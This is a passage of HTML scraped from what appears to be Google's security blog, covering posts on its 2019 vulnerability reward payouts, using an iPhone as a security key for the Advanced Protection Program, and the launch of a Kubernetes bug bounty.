Pietraszek</div> </div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </noscript> </div> </div> <div class='share'> <span class='twitter-custom social-wrapper' data-href='http://twitter.com/share?text=Google Online Security Blog:Say hello to OpenSK: a fully open-source security key implementation&url=https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html&via=google'> <img alt='Share on Twitter' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_twitter_black_24dp.png' width='24'/> </span> <span class='fb-custom social-wrapper' data-href='https://www.facebook.com/sharer.php?u=https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html'> <img alt='Share on Facebook' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_facebook_black_24dp.png' width='24'/> </span> </div> <div class='comment-container'> <i class='comment-img material-icons'>  </i> <span class='cmt_count_iframe_holder' data-count='0' data-onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;' data-post-url='https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html' data-url='https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html' style='color: #4184F3;'></span> </div> <div class='post-footer'> <div class='cmt_iframe_holder' data-href='https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html' data-viewtype='FILTERED_POSTMOD'></div> <a href='https://plus.google.com/112374322230920073195' rel='author' style='display:none;'> Google </a> <div class='label-footer'> </div> </div> </div> <div class='post' data-id='8774093356612127397' itemscope='' itemtype='http://schema.org/BlogPosting'> <h2 class='title' itemprop='name'> <a href='https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html' itemprop='url' title='Vulnerability Reward Program: 2019 Year in Review'> Vulnerability Reward Program: 2019 Year in Review </a> </h2> <div class='post-header'> <div class='published'> <span class='publishdate' itemprop='datePublished'> January 28, 2020 </span> </div> </div> <div class='post-body'> <div class='post-content' itemprop='articleBody'> <script type='text/template'> <span class="byline-author">Posted by Natasha Pabrai, Jan Keller, Jessica Lin, Anna Hupa, and Adam Bacchus, Vulnerability Reward Programs at Google</span><br /> <br /> Our Vulnerability Reward Programs were created to reward researchers for protecting users by telling us about the security bugs they find. Their discoveries help keep our users, and the internet at large, safe. We look forward to even more collaboration in 2020 and beyond.<br /> <br /> 2019 has been another record-breaking year for us, thanks to our researchers! We paid out over $6.5 million in rewards, doubling what we’ve ever paid in a single year. At the same time our researchers decided to donate an all-time-high of $500,000 to charity this year. That’s 5x the amount we have ever previously donated in a single year. Thanks so much for your hard work and generous giving!<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizXljLA2Byu7tUShfRR5hy2af3mf4S6aBqgPSjuOyIffgV-Htrifse5JRggaWr_RwuTkpctZaVq4R3kOME0Iaa6zjfNVtyUjgu4ABg8ROn6_NwlbWZfMVHvW4qHNFPzNw-nIKraRdH1s0/s1600/01+Vulnerability+Graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="645" data-original-width="1600" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizXljLA2Byu7tUShfRR5hy2af3mf4S6aBqgPSjuOyIffgV-Htrifse5JRggaWr_RwuTkpctZaVq4R3kOME0Iaa6zjfNVtyUjgu4ABg8ROn6_NwlbWZfMVHvW4qHNFPzNw-nIKraRdH1s0/s640/01+Vulnerability+Graph.png" width="640" /></a></div> Since 2010, we have expanded our VRPs to cover additional Google product areas, including Chrome, Android, and most recently Abuse. We've also expanded to cover popular third party apps on Google Play, helping identify and disclose vulnerabilities to impacted app developers. Since then we have paid out more than $21 million in rewards*. As we have done in years past, we are sharing our 2019 Year in Review across these programs.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxudm6n6SatHxZdxPlqmnHpSTxC5RkXlup79d08kS1VcX8LP-_S9solQd7r1fPt3F7ptceeptwljXktzpHSawx9E5ax1BU8jjNjpdHpQkptQcQYdK4stM8oYpEeiDYSj3JgH-OWCUDCOE/s1600/02+Vulnerability+Graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="454" data-original-width="1600" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxudm6n6SatHxZdxPlqmnHpSTxC5RkXlup79d08kS1VcX8LP-_S9solQd7r1fPt3F7ptceeptwljXktzpHSawx9E5ax1BU8jjNjpdHpQkptQcQYdK4stM8oYpEeiDYSj3JgH-OWCUDCOE/s640/02+Vulnerability+Graph.png" width="640" /></a></div> <b>What’s changed in the past year?</b><br /> <br /> <ul> <li>Chrome’s VRP increased its reward payouts by tripling the maximum baseline reward amount from $5,000 to $15,000 and doubling the maximum reward amount for high quality reports from $15,000 to $30,000. The additional bonus given to bugs found by fuzzers running under the Chrome Fuzzer Program is also doubling to $1,000. More details can be found in their <a href="https://g.co/ChromeBugRewards#rewards">program rules page</a>.</li> <li>Android Security Rewards expanded its program with new exploit categories and higher rewards. The top prize is now $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. And if you achieve that exploit on specific developer preview versions of Android, we’re adding in a 50% bonus, making the top prize $1.5 million. See our <a href="https://www.google.com/about/appsecurity/android-rewards/">program rules page</a> for more details around our new exploit categories and rewards.</li> <li>Abuse VRP engaged in outreach and education to increase researchers awareness about the program, presenting an overview of our Abuse program in Australia, Malaysia, Vietnam, the UK and US.</li> <li>The <a href="https://hackerone.com/googleplay">Google Play Security Reward Program</a> expanded scope to any app with over 100 million installs, resulting in over $650,000 in rewards in the second half of 2019.</li> <li>The <a href="https://hackerone.com/ddp_reward_program">Developer Data Protection Reward Program</a> was launched in 2019 to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions.</li> </ul> <div> We also had the goal of increasing engagement with our security researchers over the last year at events such as <a href="https://www.facebook.com/notes/facebook-bug-bounty/bountycon-2019-is-a-wrap/2568024086545135/">BountyCon</a> in Singapore and <a href="https://twitter.com/GoogleVRP/status/1197449225405112320">ESCAL8 in London</a>. These events not only allow us to get to know each of our bug hunters but also provide a space for bug hunters to meet one another and hopefully work together on future exploits.</div> <div> <br /></div> <div> A hearty thank you to everyone that contributed to the VRPs in 2019. We are looking forward to increasing engagement even more in 2020 as both Google and Chrome VRPs will turn 10. Stay tuned for celebrations. Follow us on <a href="https://twitter.com/GoogleVRP">@GoogleVRP</a><br /> <br /> <i>*The total amount was updated on January 28; it previously said we paid out more than $15 million in rewards.</i></div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </script> <noscript> <span class="byline-author">Posted by Natasha Pabrai, Jan Keller, Jessica Lin, Anna Hupa, and Adam Bacchus, Vulnerability Reward Programs at Google</span><br /> <br /> Our Vulnerability Reward Programs were created to reward researchers for protecting users by telling us about the security bugs they find. Their discoveries help keep our users, and the internet at large, safe. We look forward to even more collaboration in 2020 and beyond.<br /> <br /> 2019 has been another record-breaking year for us, thanks to our researchers! We paid out over $6.5 million in rewards, doubling what we’ve ever paid in a single year. At the same time our researchers decided to donate an all-time-high of $500,000 to charity this year. That’s 5x the amount we have ever previously donated in a single year. Thanks so much for your hard work and generous giving!<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizXljLA2Byu7tUShfRR5hy2af3mf4S6aBqgPSjuOyIffgV-Htrifse5JRggaWr_RwuTkpctZaVq4R3kOME0Iaa6zjfNVtyUjgu4ABg8ROn6_NwlbWZfMVHvW4qHNFPzNw-nIKraRdH1s0/s1600/01+Vulnerability+Graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="645" data-original-width="1600" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizXljLA2Byu7tUShfRR5hy2af3mf4S6aBqgPSjuOyIffgV-Htrifse5JRggaWr_RwuTkpctZaVq4R3kOME0Iaa6zjfNVtyUjgu4ABg8ROn6_NwlbWZfMVHvW4qHNFPzNw-nIKraRdH1s0/s640/01+Vulnerability+Graph.png" width="640" /></a></div> Since 2010, we have expanded our VRPs to cover additional Google product areas, including Chrome, Android, and most recently Abuse. We've also expanded to cover popular third party apps on Google Play, helping identify and disclose vulnerabilities to impacted app developers. Since then we have paid out more than $21 million in rewards*. As we have done in years past, we are sharing our 2019 Year in Review across these programs.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxudm6n6SatHxZdxPlqmnHpSTxC5RkXlup79d08kS1VcX8LP-_S9solQd7r1fPt3F7ptceeptwljXktzpHSawx9E5ax1BU8jjNjpdHpQkptQcQYdK4stM8oYpEeiDYSj3JgH-OWCUDCOE/s1600/02+Vulnerability+Graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="454" data-original-width="1600" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxudm6n6SatHxZdxPlqmnHpSTxC5RkXlup79d08kS1VcX8LP-_S9solQd7r1fPt3F7ptceeptwljXktzpHSawx9E5ax1BU8jjNjpdHpQkptQcQYdK4stM8oYpEeiDYSj3JgH-OWCUDCOE/s640/02+Vulnerability+Graph.png" width="640" /></a></div> <b>What’s changed in the past year?</b><br /> <br /> <ul> <li>Chrome’s VRP increased its reward payouts by tripling the maximum baseline reward amount from $5,000 to $15,000 and doubling the maximum reward amount for high quality reports from $15,000 to $30,000. The additional bonus given to bugs found by fuzzers running under the Chrome Fuzzer Program is also doubling to $1,000. More details can be found in their <a href="https://g.co/ChromeBugRewards#rewards">program rules page</a>.</li> <li>Android Security Rewards expanded its program with new exploit categories and higher rewards. The top prize is now $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. And if you achieve that exploit on specific developer preview versions of Android, we’re adding in a 50% bonus, making the top prize $1.5 million. See our <a href="https://www.google.com/about/appsecurity/android-rewards/">program rules page</a> for more details around our new exploit categories and rewards.</li> <li>Abuse VRP engaged in outreach and education to increase researchers awareness about the program, presenting an overview of our Abuse program in Australia, Malaysia, Vietnam, the UK and US.</li> <li>The <a href="https://hackerone.com/googleplay">Google Play Security Reward Program</a> expanded scope to any app with over 100 million installs, resulting in over $650,000 in rewards in the second half of 2019.</li> <li>The <a href="https://hackerone.com/ddp_reward_program">Developer Data Protection Reward Program</a> was launched in 2019 to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions.</li> </ul> <div> We also had the goal of increasing engagement with our security researchers over the last year at events such as <a href="https://www.facebook.com/notes/facebook-bug-bounty/bountycon-2019-is-a-wrap/2568024086545135/">BountyCon</a> in Singapore and <a href="https://twitter.com/GoogleVRP/status/1197449225405112320">ESCAL8 in London</a>. These events not only allow us to get to know each of our bug hunters but also provide a space for bug hunters to meet one another and hopefully work together on future exploits.</div> <div> <br /></div> <div> A hearty thank you to everyone that contributed to the VRPs in 2019. We are looking forward to increasing engagement even more in 2020 as both Google and Chrome VRPs will turn 10. Stay tuned for celebrations. Follow us on <a href="https://twitter.com/GoogleVRP">@GoogleVRP</a><br /> <br /> <i>*The total amount was updated on January 28; it previously said we paid out more than $15 million in rewards.</i></div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </noscript> </div> </div> <div class='share'> <span class='twitter-custom social-wrapper' data-href='http://twitter.com/share?text=Google Online Security Blog:Vulnerability Reward Program: 2019 Year in Review&url=https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html&via=google'> <img alt='Share on Twitter' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_twitter_black_24dp.png' width='24'/> </span> <span class='fb-custom social-wrapper' data-href='https://www.facebook.com/sharer.php?u=https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html'> <img alt='Share on Facebook' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_facebook_black_24dp.png' width='24'/> </span> </div> <div class='comment-container'> <i class='comment-img material-icons'>  </i> <span class='cmt_count_iframe_holder' data-count='0' data-onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;' data-post-url='https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html' data-url='https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html' style='color: #4184F3;'></span> </div> <div class='post-footer'> <div class='cmt_iframe_holder' data-href='https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html' data-viewtype='FILTERED_POSTMOD'></div> <a href='https://plus.google.com/112374322230920073195' rel='author' style='display:none;'> Google </a> <div class='label-footer'> <span class='labels-caption'> Labels: </span> <span class='labels'> <a class='label' href='https://security.googleblog.com/search/label/android%20security' rel='tag'> android security </a> </span> </div> </div> </div> <div class='post' data-id='3940323990877633093' itemscope='' itemtype='http://schema.org/BlogPosting'> <h2 class='title' itemprop='name'> <a href='https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html' itemprop='url' title='Have an iPhone? Use it to protect your Google Account with the Advanced Protection Program'> Have an iPhone? Use it to protect your Google Account with the Advanced Protection Program </a> </h2> <div class='post-header'> <div class='published'> <span class='publishdate' itemprop='datePublished'> January 15, 2020 </span> </div> </div> <div class='post-body'> <div class='post-content' itemprop='articleBody'> <script type='text/template'> <span class="byline-author">Posted by Christiaan Brand, Product Manager, Google Cloud and Kaiyu Yan, Software Engineer, Google</span><br /> <span class="byline-author"><br /></span> <span class="byline-author"><span id="docs-internal-guid-bc9b1c30-7fff-1b9f-05fa-a740ee25cd5d"></span></span><br /> Phishing—when an online attacker tries to trick you into giving them your username and password—is one of the most common causes of account compromises. We recently partnered with The Harris Poll to survey 500 high-risk users (politicians and their staff, journalists, business executives, activists, online influencers) living in the U.S. Seventy-four percent of them reported having been the target of a phishing attempt or compromised by a phishing attack.<br /> <br /> Gmail automatically blocks more than 100 million phishing emails every day and warns people that are targeted by government-backed attackers, but you can further strengthen the security of your Google Account by enrolling in the <a href="https://landing.google.com/advancedprotection/">Advanced Protection Program</a>—our strongest security protections that automatically help defend against evolving methods attackers use to gain access to your personal and work Google Accounts and data.<br /> <br /> Security keys are an important feature of the Advanced Protection Program, because they provide the strongest protection against phishing attacks. In the past, you had to separately purchase and carry physical security keys. Last year, we built security keys <a href="https://www.blog.google/technology/safety-security/your-android-phone-is-a-security-key/">into Android phones</a>—and starting today, you can activate a security key on your iPhone to help protect your Google Account.<br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-zwUg201awcQ/Xh5fm4evywI/AAAAAAAABdc/9VCCOAiv0xwQg2vVD4UNZSDVp-ZEvqSFgCNcBGAsYHQ/s1600/ipaask1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="285" height="400" src="https://1.bp.blogspot.com/-zwUg201awcQ/Xh5fm4evywI/AAAAAAAABdc/9VCCOAiv0xwQg2vVD4UNZSDVp-ZEvqSFgCNcBGAsYHQ/s400/ipaask1.png" width="222" /></a></div> <div style="text-align: center;"> <b><span style="font-size: x-small;">Activating the security key on your iPhone with Google’s Smart Lock app</span></b></div> <div style="text-align: left;"> <br /></div> Security keys use public-key cryptography to verify your identity and URL of the login page, so that an attacker can’t access your account even if they have your username or password. Unlike other two-factor authentication (2FA) methods that try to verify your sign-in, security keys are built with <a href="https://fidoalliance.org/how-fido-works/">FIDO standards</a> that provide the <a href="https://security.googleblog.com/2019/05/new-research-how-effective-is-basic.html">strongest</a> protection against automated bots, bulk phishing attacks, and targeted phishing attacks. You can learn more about security keys from our <a href="https://youtu.be/ktN88Vnmnns">Cloud Next ‘19 presentation</a>. <br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-lhujXbnekg0/Xh5nDvUmhsI/AAAAAAAABd4/JT3P9EO2VRIjlhaO8ubHmuGN5X2QXezBgCNcBGAsYHQ/s1600/ipaask2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="256" data-original-width="512" height="200" src="https://1.bp.blogspot.com/-lhujXbnekg0/Xh5nDvUmhsI/AAAAAAAABd4/JT3P9EO2VRIjlhaO8ubHmuGN5X2QXezBgCNcBGAsYHQ/s400/ipaask2.gif" width="400" /></a></div> <div style="text-align: center;"> <br /></div> <div style="text-align: center;"> <b><span style="font-size: x-small;">Approving the sign-in to a Google Account with Google’s SmartLock app on an iPhone</span></b></div> <div style="text-align: center;"> <b><br /></b></div> On your iPhone, the security key can be activated with Google’s <a href="https://apps.apple.com/us/app/google-smart-lock/id1152066360">Smart Lock app</a>; on your Android phone, the functionality is built in. The security key in your phone uses Bluetooth to verify your sign-in on Chrome OS, iOS, macOS and Windows 10 devices without requiring you to pair your devices. This helps protect your Google Account on virtually any device with the convenience of your phone.<br /> <b><br /></b> <b>How to get started</b><br /> <b><br /></b> Follow these simple steps to help protect your personal or work Google Account today:<br /> <ul> <li><a href="http://support.google.com/accounts/answer/9289445">Activate</a> your phone’s security key (Android 7+ or iOS 10+)</li> <li><a href="https://myaccount.google.com/advanced-protection/landing">Enroll</a> in the Advanced Protection Program</li> <li>When signing in to your Google Account, make sure Bluetooth is turned on on your phone and the device you’re signing in on.</li> </ul> We also highly recommend registering a backup security key to your account and keeping it in a safe place, so you can get into your account if you lose your phone. You can get a security key from a number of vendors, including Google, with our own <a href="https://store.google.com/us/product/titan_security_key">Titan Security Key</a>.<br /> <br /> If you’re a Google Cloud customer, you can find out more about the Advanced Protection Program for the enterprise <a href="https://gsuiteupdates.googleblog.com/2019/11/advanced-protection-program-high-risk-users.html">on our G Suite Updates blog</a>.<br /> <br /> Here’s to stronger account security—right in your pocket. <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </script> <noscript> <span class="byline-author">Posted by Christiaan Brand, Product Manager, Google Cloud and Kaiyu Yan, Software Engineer, Google</span><br /> <span class="byline-author"><br /></span> <span class="byline-author"><span id="docs-internal-guid-bc9b1c30-7fff-1b9f-05fa-a740ee25cd5d"></span></span><br /> Phishing—when an online attacker tries to trick you into giving them your username and password—is one of the most common causes of account compromises. We recently partnered with The Harris Poll to survey 500 high-risk users (politicians and their staff, journalists, business executives, activists, online influencers) living in the U.S. Seventy-four percent of them reported having been the target of a phishing attempt or compromised by a phishing attack.<br /> <br /> Gmail automatically blocks more than 100 million phishing emails every day and warns people that are targeted by government-backed attackers, but you can further strengthen the security of your Google Account by enrolling in the <a href="https://landing.google.com/advancedprotection/">Advanced Protection Program</a>—our strongest security protections that automatically help defend against evolving methods attackers use to gain access to your personal and work Google Accounts and data.<br /> <br /> Security keys are an important feature of the Advanced Protection Program, because they provide the strongest protection against phishing attacks. In the past, you had to separately purchase and carry physical security keys. Last year, we built security keys <a href="https://www.blog.google/technology/safety-security/your-android-phone-is-a-security-key/">into Android phones</a>—and starting today, you can activate a security key on your iPhone to help protect your Google Account.<br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-zwUg201awcQ/Xh5fm4evywI/AAAAAAAABdc/9VCCOAiv0xwQg2vVD4UNZSDVp-ZEvqSFgCNcBGAsYHQ/s1600/ipaask1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="285" height="400" src="https://1.bp.blogspot.com/-zwUg201awcQ/Xh5fm4evywI/AAAAAAAABdc/9VCCOAiv0xwQg2vVD4UNZSDVp-ZEvqSFgCNcBGAsYHQ/s400/ipaask1.png" width="222" /></a></div> <div style="text-align: center;"> <b><span style="font-size: x-small;">Activating the security key on your iPhone with Google’s Smart Lock app</span></b></div> <div style="text-align: left;"> <br /></div> Security keys use public-key cryptography to verify your identity and URL of the login page, so that an attacker can’t access your account even if they have your username or password. Unlike other two-factor authentication (2FA) methods that try to verify your sign-in, security keys are built with <a href="https://fidoalliance.org/how-fido-works/">FIDO standards</a> that provide the <a href="https://security.googleblog.com/2019/05/new-research-how-effective-is-basic.html">strongest</a> protection against automated bots, bulk phishing attacks, and targeted phishing attacks. You can learn more about security keys from our <a href="https://youtu.be/ktN88Vnmnns">Cloud Next ‘19 presentation</a>. <br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-lhujXbnekg0/Xh5nDvUmhsI/AAAAAAAABd4/JT3P9EO2VRIjlhaO8ubHmuGN5X2QXezBgCNcBGAsYHQ/s1600/ipaask2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="256" data-original-width="512" height="200" src="https://1.bp.blogspot.com/-lhujXbnekg0/Xh5nDvUmhsI/AAAAAAAABd4/JT3P9EO2VRIjlhaO8ubHmuGN5X2QXezBgCNcBGAsYHQ/s400/ipaask2.gif" width="400" /></a></div> <div style="text-align: center;"> <br /></div> <div style="text-align: center;"> <b><span style="font-size: x-small;">Approving the sign-in to a Google Account with Google’s SmartLock app on an iPhone</span></b></div> <div style="text-align: center;"> <b><br /></b></div> On your iPhone, the security key can be activated with Google’s <a href="https://apps.apple.com/us/app/google-smart-lock/id1152066360">Smart Lock app</a>; on your Android phone, the functionality is built in. The security key in your phone uses Bluetooth to verify your sign-in on Chrome OS, iOS, macOS and Windows 10 devices without requiring you to pair your devices. This helps protect your Google Account on virtually any device with the convenience of your phone.<br /> <b><br /></b> <b>How to get started</b><br /> <b><br /></b> Follow these simple steps to help protect your personal or work Google Account today:<br /> <ul> <li><a href="http://support.google.com/accounts/answer/9289445">Activate</a> your phone’s security key (Android 7+ or iOS 10+)</li> <li><a href="https://myaccount.google.com/advanced-protection/landing">Enroll</a> in the Advanced Protection Program</li> <li>When signing in to your Google Account, make sure Bluetooth is turned on on your phone and the device you’re signing in on.</li> </ul> We also highly recommend registering a backup security key to your account and keeping it in a safe place, so you can get into your account if you lose your phone. You can get a security key from a number of vendors, including Google, with our own <a href="https://store.google.com/us/product/titan_security_key">Titan Security Key</a>.<br /> <br /> If you’re a Google Cloud customer, you can find out more about the Advanced Protection Program for the enterprise <a href="https://gsuiteupdates.googleblog.com/2019/11/advanced-protection-program-high-risk-users.html">on our G Suite Updates blog</a>.<br /> <br /> Here’s to stronger account security—right in your pocket. <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </noscript> </div> </div> <div class='share'> <span class='twitter-custom social-wrapper' data-href='http://twitter.com/share?text=Google Online Security Blog:Have an iPhone? Use it to protect your Google Account with the Advanced Protection Program&url=https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html&via=google'> <img alt='Share on Twitter' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_twitter_black_24dp.png' width='24'/> </span> <span class='fb-custom social-wrapper' data-href='https://www.facebook.com/sharer.php?u=https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html'> <img alt='Share on Facebook' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_facebook_black_24dp.png' width='24'/> </span> </div> <div class='comment-container'> <i class='comment-img material-icons'>  </i> <span class='cmt_count_iframe_holder' data-count='0' data-onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;' data-post-url='https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html' data-url='https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html' style='color: #4184F3;'></span> </div> <div class='post-footer'> <div class='cmt_iframe_holder' data-href='https://security.googleblog.com/2020/01/have-iphone-use-it-to-protect-your.html' data-viewtype='FILTERED_POSTMOD'></div> <a href='https://plus.google.com/112374322230920073195' rel='author' style='display:none;'> Google </a> <div class='label-footer'> </div> </div> </div> <div class='post' data-id='3755530779899321300' itemscope='' itemtype='http://schema.org/BlogPosting'> <h2 class='title' itemprop='name'> <a href='https://security.googleblog.com/2020/01/securing-open-source-how-google.html' itemprop='url' title='Securing open-source: how Google supports the new Kubernetes bug bounty'> Securing open-source: how Google supports the new Kubernetes bug bounty </a> </h2> <div class='post-header'> <div class='published'> <span class='publishdate' itemprop='datePublished'> January 14, 2020 </span> </div> </div> <div class='post-body'> <div class='post-content' itemprop='articleBody'> <script type='text/template'> <span class="byline-author">Posted by Maya Kaczorowski, Product Manager, Container Security and Aaron Small, Product Manager, GKE On-Prem Security</span><br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-XGzknm5_BDA/Xh0qmu17ppI/AAAAAAAABc4/73fUXZTkUFc96pfkCXX9inChKA3uLWAoQCNcBGAsYHQ/s1600/kubernetes-bug-bounty-01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="836" data-original-width="1600" height="334" src="https://1.bp.blogspot.com/-XGzknm5_BDA/Xh0qmu17ppI/AAAAAAAABc4/73fUXZTkUFc96pfkCXX9inChKA3uLWAoQCNcBGAsYHQ/s640/kubernetes-bug-bounty-01.jpg" width="640" /></a></div> <br /> At Google, we care deeply about the security of open-source projects, as they’re such a critical part of our infrastructure—and indeed everyone’s. Today, the Cloud-Native Computing Foundation (CNCF) announced a <a href="https://hackerone.com/kubernetes">new bug bounty program for Kubernetes</a> that we helped create and get up and running. Here’s a brief overview of the program, other ways we help secure open-source projects and information on how you can get involved.<br /> <div> <br /></div> <b>Launching the Kubernetes bug bounty program</b><br /> <b><br /></b> <a href="https://kubernetes.io/">Kubernetes</a> is a CNCF project. As part of <a href="https://github.com/cncf/toc/pull/145">its graduation criteria</a>, the CNCF recently funded the project’s first <a href="https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Final%20Report.pdf">security audit</a>, to review its core areas and identify potential issues. The audit identified and addressed several previously unknown security issues. Thankfully, Kubernetes already had a <a href="https://github.com/kubernetes/community/tree/master/committee-product-security">Product Security Committee</a>, including engineers from the <a href="https://cloud.google.com/kubernetes-engine/">Google Kubernetes Engine</a> (GKE) security team, who respond to and patch any newly discovered bugs. But the job of securing an open-source project is never done. To increase awareness of Kubernetes’ security model, attract new security researchers, and reward ongoing efforts in the community, the Kubernetes Product Security Committee began <a href="https://docs.google.com/document/d/1dvlQsOGODhY3blKpjTg6UXzRdPzv5y8V55RD_Pbo7ag/edit#heading=h.7t1efwpev42p">discussions in 2018</a> about launching an official bug bounty program.<br /> <div> <br /></div> <b>Find Kubernetes bugs, get paid</b><br /> <div> <br /></div> <div> What kind of bugs does the bounty program recognize? Most of the content you’d think of as ‘core’ Kubernetes, included at <a href="https://github.com/kubernetes">https://github.com/kubernetes</a>, is in scope. We’re interested in common kinds of security issues like remote code execution, privilege escalation, and bugs in authentication or authorization. Because Kubernetes is a community project, we’re also interested in the Kubernetes supply chain, including build and release processes that might allow a malicious individual to gain unauthorized access to commits, or otherwise affect build artifacts. This is a bit different from your standard bug bounty as there isn’t a ‘live’ environment for you to test—Kubernetes can be configured in many different ways, and we’re looking for bugs that affect any of those (except when existing configuration options could mitigate the bug). Thanks to the CNCF’s ongoing support and funding of this new program, depending on the bug, you can be rewarded with a bounty anywhere from $100 to $10,000.</div> <div> <br /></div> The bug bounty program has been in a private release for several months, with invited researchers submitting bugs and to help us test the triage process. And today, the new Kubernetes bug bounty program is live! We’re excited to see what kind of bugs you discover, and are ready to respond to new reports. You can learn more about the program and how to get involved <a href="https://kubernetes.io/blog/2020/01/14/kubernetes-bug-bounty-announcement/">here</a>.<br /> <div> <br /></div> <b>Dedicated to Kubernetes security</b><br /> <b><br /></b> Google has been involved in this new Kubernetes bug bounty from the get-go: proposing the program, completing vendor evaluations, defining the initial scope, testing the process, and onboarding <a href="https://www.hackerone.com/blog/hackerone-launches-bug-bounty-program-kubernetes">HackerOne</a> to implement the bug bounty solution. Though this is a big effort, it’s part of our ongoing commitment to securing Kubernetes. Google continues to be involved in every part of Kubernetes security, including <a href="https://cloud.google.com/blog/products/containers-kubernetes/exploring-container-security-vulnerability-management-in-open-source-kubernetes">responding to vulnerabilities </a>as part of the Kubernetes Product Security Committee, <a href="https://github.com/kubernetes/community/tree/master/sig-auth">chairing the sig-auth Kubernetes special interest group</a>, and <a href="https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-security-audit-what-gke-and-anthos-users-need-to-know">leading the aforementioned Kubernetes security audit</a>. We realize that security is a critical part of any user’s decision to use an open-source tool, so we dedicate resources to help ensure we’re providing the best possible security for Kubernetes and GKE.<br /> <br /> Although the Kubernetes bug bounty program is new, it isn’t a novel strategy for Google. We have enjoyed a close relationship with the security research community for many years and, in 2010, Google established our own <a href="https://www.google.com/about/appsecurity/reward-program/">Vulnerability Rewards Program</a> (VRP). The VRP provides rewards for vulnerabilities reported in GKE and virtually all other Google Cloud services. (If you find a bug in GKE that isn’t specific to Kubernetes core, you should still report it to the Google VRP!) Nor is Kubernetes the only open-source project with a bug bounty program. In fact, we recently expanded our <a href="https://www.google.com/about/appsecurity/patch-rewards/">Patch Rewards program</a> to provide financial rewards <a href="https://security.googleblog.com/2019/12/announcing-updates-to-our-patch-rewards.html">both upfront and after-the-fact</a> for security improvements to open-source projects.<br /> <div> <br /></div> <div> Help keep the world’s infrastructure safe. <a href="https://hackerone.com/kubernetes">Report a bug to the Kubernetes bug bounty</a>, or a GKE bug to <a 